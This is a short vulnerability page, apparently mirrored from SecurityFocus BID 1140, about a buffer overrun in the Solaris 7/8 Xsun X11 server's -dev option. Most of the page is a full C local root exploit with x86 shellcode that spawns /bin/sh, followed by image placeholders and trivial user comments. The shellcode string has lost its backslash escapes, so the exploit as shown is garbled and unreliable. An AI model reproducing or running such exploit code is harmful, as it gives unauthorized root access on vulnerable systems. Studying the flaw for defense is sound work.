source: http://www.securityfocus.com/bid/1140/info
A buffer overrun vulnerability exists in the Xsun X11 server, as shipped as part of Solaris 7 and 8 from Sun Microsystems. By supplying a long argument to the -dev option (normally used to set the output device), it is possible to execute arbitrary code with setgid root permissions. This can be further leveraged to gain root privileges, resulting in machine compromise.
/*
*
* Solaris 7 Xsun(suid) local overflow - PRIVATE for now!
* Solaris 2.7/(2.6?) x86 sploit no sparc code, yet!
*
* Discovered/sploited By DiGiT - [email protected]
*
* Greets: #!ADM, #!security.is
*/
#include <stdio.h>
#include <stdlib.h>
// Generic solaris x86 shellcode by cheeze wizz
char shellcode[] =
"xebx48x9axffxffxffxffx07xffxc3x5ex31xc0x89x46xb4"
"x88x46xb9x88x46x07x89x46x0cx31xc0x50xb0x8dxe8xdf"
"xffxffxffx83xc4x04x31xc0x50xb0x17xe8xd2xffxffxff"
"x83xc4x04x31xc0x50x8dx5ex08x53x8dx1ex89x5ex08x53"
"xb0x3bxe8xbbxffxffxffx83xc4x0cxe8xbbxffxffxffx2f"
"x62x69x6ex2fx73x68xffxffxffxffxffxffxffxffxff";
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int argc, char *argv[]) {
char buff[5000];
int nopcount=2001, bsize=4000, offset=1850;
int i;
if (argc > 1) nopcount = atoi(argv[1]);
if (argc > 2) bsize = atoi(argv[2]);
if (argc > 3) offset = atoi(argv[3]);
memset (buff, 0x90, bsize);
for (i = nopcount; i < bsize - 4; i += 4)
*(long *) &buff[i] = get_esp() + offset;
memcpy (buff + (nopcount - strlen (shellcode)), shellcode, strlen
(shellcode));
memcpy (buff, ":", 1);
printf("Oh boy. DiGiT presents r00tn");
execl("/usr/openwin/bin/Xsun", "Xsun", "-dev", buff, NULL);
}
![图片[1]-Solaris Xsun缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_50_100/t01bbbb9ac447dabd6a.png)
CVE编号
![图片[2]-Solaris Xsun缓冲区溢出漏洞-安全小百科](https://p0.ssl.qhimg.com/dr/29_150_100/t01cd54df57948e31ea.png)
CNNVD-ID
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666